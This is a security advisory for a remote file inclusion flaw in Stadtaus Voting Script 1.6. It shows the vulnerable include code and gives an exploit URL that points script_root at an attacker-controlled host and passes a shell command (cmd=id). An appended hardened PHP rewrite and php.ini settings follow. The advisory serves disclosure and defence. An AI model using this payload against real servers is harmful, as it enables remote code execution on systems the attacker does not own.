-----------------------------------------------------------------------------
Name:     Stadtaus Voting Script
Release:  1.6
Homepage: http://www.stadtaus.com/php_scripts/voting_script/
Attack:   Remote file inclusion
Risk:     High
Date:     8 March 2005
Author:   Nextime
-----------------------------------------------------------------------------

CODE:

file: /vs1.6/inc/core.inc.php

/*****************************************************
** Include functions
*****************************************************/

include($script_root . 'inc/functions.inc.php');
include($script_root . 'inc/template.class.inc.php');
include($script_root . 'inc/form_fields.class.inc.php');
include($script_root . 'inc/voting.class.inc.php');

---------------------------------------------------------------------------------------------

ATTACK:

core.inc.php uses $script_root as the base path of its includes without ever setting or
validating it. If register_globals=on and allow_url_fopen=on, the variable can be supplied
in the query string of a direct request to core.inc.php and points the includes at a remote
host:

http://[target]/vs1.6/inc/core.inc.php?script_root=http://[attacker_host]/script.php?&cmd=id;

---------------------------------------------------------------------------------------------

FIX:

Vendor has been notified

---------------------------------------------------------------------------------------------

Contact: Nextime - nextime [at] linuxmail [dot] org
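A hardened form of the include block above, added here as an illustration and not the vendor's own fix. It assumes the front-end scripts define a constant named VS_ENTRY_POINT before including core.inc.php (a hypothetical name); the rest relies only on standard PHP functions.

```php
<?php
/*****************************************************
** Include functions (hardened example, not vendor code)
*****************************************************/

// 1. core.inc.php is a library file. Refuse to run when it is requested
//    directly instead of being included by an entry script. The entry
//    script is assumed to do: define('VS_ENTRY_POINT', true); before the
//    include (VS_ENTRY_POINT is a hypothetical name for this example).
if (!defined('VS_ENTRY_POINT')) {
    header('HTTP/1.1 403 Forbidden');
    exit('Direct access not permitted.');
}

// 2. Never take the include base from request data. Under register_globals
//    a query parameter named script_root would already have populated
//    $script_root; assigning it unconditionally from this file's own
//    location discards any such value. dirname(__FILE__) is used instead
//    of __DIR__ so the code also runs on the PHP 4 installs of the time.
$script_root = dirname(__FILE__) . '/../';

// 3. Resolve to a real, existing directory before using it. realpath()
//    returns false for anything that is not a local directory, so a
//    remote URL or a dangling path can never reach include().
$real_root = realpath($script_root);
if ($real_root === false || !is_dir($real_root)) {
    exit('Invalid script root.');
}
$script_root = $real_root . '/';

include($script_root . 'inc/functions.inc.php');
include($script_root . 'inc/template.class.inc.php');
include($script_root . 'inc/form_fields.class.inc.php');
include($script_root . 'inc/voting.class.inc.php');
```

On the server side the same class of bug is contained by setting register_globals = Off and allow_url_fopen = Off in php.ini (on PHP 5.2 and later, allow_url_include = Off is the setting that specifically governs remote includes).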